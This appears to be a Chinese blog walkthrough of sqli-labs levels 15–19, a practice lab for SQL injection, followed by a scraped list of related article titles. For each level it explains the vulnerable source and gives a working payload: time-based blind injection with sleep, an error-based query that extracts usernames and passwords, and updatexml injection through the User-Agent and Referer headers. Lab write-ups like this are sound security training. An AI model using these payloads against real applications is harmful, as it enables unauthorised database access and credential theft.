15关

查看源码如下:

这里看护出是用post提交的参数，用单引号闭合

把回显报错给注释掉了，现在得知我们只能用延时注入，试一下简单的看会不会延时

输入时间盲注payload，注入成功

uname=admin' and sleep(5)%23

16关

分析源代码：

和15关一样的post提交

但是这里换成了“闭合方式

同样注释了mysql的回显报错，用上局的payload闭合方式换成”测试一下

成功睡了5秒 ，下面是payload

uname=admin") and sleep(5)%23

17关

首先简单源码分析：

post提交，在这里 设置了过滤参数，但是passwd没有

magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据，如包括有：post、get、cookie过来的数据增加转义字符“\”，在magic_quotes_gpc = On的情况下，如果输入的数据有单引号（’）、双引号（”）、反斜线（\）与 NULL（NULL 字符）等字符都会被加上反斜线。

使用单引号闭合

这里报错了，会echo出来，那我们直接就可以尝试一下报错注入，从passwd入手

使用报错注入成功，下面是payload

uname=admin&passwd=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x7e,CAST(CONCAT(username,password) AS CHAR),0x7e)) FROM users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)%23

18关

查看源代码：

同样的post提交方式

对我们提交两个参数都进行了过滤

这里 获取请求的 uagent 和 IP地址

insert语句这里 ip_address 和 uagent 使用单引号拼接，并且没有设置过滤

输出$uagent

并输出了mysql的报错信息，可以尝试报错注入，延时注入

payload

1' and updatexml(1,concat(0x7e,(select datebase()),0x7e),1) and '%23

19关

依然是post提交

对两个参数进行过滤

输出 $_server['http_referer']

本关和 Less-18 异曲同工，只是这里的漏洞点出在了 referer 里面，其他利用方式基本上也是一毛一样，所以下面直接上 payload 演示吧：

 1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '%23

sqli-labs（15-19关）笔记相关推荐

1. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

   第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

2. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

   第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

3. SQLi LABS Less 26a 联合注入+布尔盲注

   第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...

4. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

   第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

5. sqli——labs初学者通关详

   目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...

6. SQLi LABS Less-19

   第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号 ...

7. Markdown 15 款顶级笔记软件测评推荐

   Markdown 15 款顶级笔记软件测评推荐 https://www.youtube.com/watch?v=oGF_qp10Qtc&ab_channel=%E4%BA%8C%E4%B8%8 ...

8. 耶鲁大学博弈论公开课全24集第19集笔记：招商引资和战略投资

   耶鲁大学博弈论公开课全24集第19集笔记:招商引资和战略投资 1. 视频地址 2. 本集思维导图 3. 上集回顾 4. 案例一:"别搞砸了" 4.1 问题分析 4.2 冗余的指示告 ...

9. 《逃离100层》攻略13、19关

   逃离100层第13关攻略.逃离100层第19关攻略. [逃离100层第13关] 第13关,我们发现两个箱子上有不同的颜色的纸张,并且电梯上挂了好多画像.可以推理出含有蓝色图片有5张,含有黄色图片有6张 ...

10. SQLi LABS Less 15 布尔盲注

    第十五是单引号字符串型注入,推荐使用布尔盲注. 一.功能分析 输入用户名和密码,后台接收参数查询数据库. 如果用户名和密码存在,页面提示登录成功. 如果用户名和密码不存在,页面提示登录失败. 二.思路 ...

最新文章

1. sql server 根据身份证号计算出生日期和年龄的存储过程
2. Xshell远程登录Ubuntu
3. CrowdHuman 测试
4. eclipse创建springboot项目_创建一个 Spring Boot 项目，你会几种方法？
5. python代码案例详解-Python编程：案例详解输出函数print
6. Java IO 之 管道流 原理分析
7. 用Word写博客园文章
8. 875. Koko Eating Bananas
9. 表妹好奇地问的飞鸽传书
10. 所有的生意都是在做两件事
11. 51单片机 | 模拟PWM调制控制实验
12. Hyperledger Composer和Hyperledger Fabric的关系、区别及概念
13. DB2数据库常用命令
14. 代码雨大全（装逼或学习）--KuaiLe推荐
15. 易语言获取html源码,易语言获取网页源码的方法
16. 首都师范 博弈论 9 5 5引入物质奖励后的博弈模型
17. C#自定义控件添加至工具箱的方法
18. 观古之四大名著《水浒传》有感
19. python棋盘格标定程序
20. SQLServer删除数据列

热门文章

1. 1 时空拯救队，登场
2. 大数据分析-第七章 聚类
3. 50道基础sql语句
4. 北京2018年计算机技校,2018年北京十大技校排名 排名前十的学校有哪些?
5. Solidworks用引导线放样
6. 解读丨交通物流如何融合发展？线上线下联动出击
7. Maxthon傲视群雄正式版试用手记(转)
8. Qt Windows 环境搭建
9. 启动微服务时端口被占用问题
10. MATLAB神经网络算法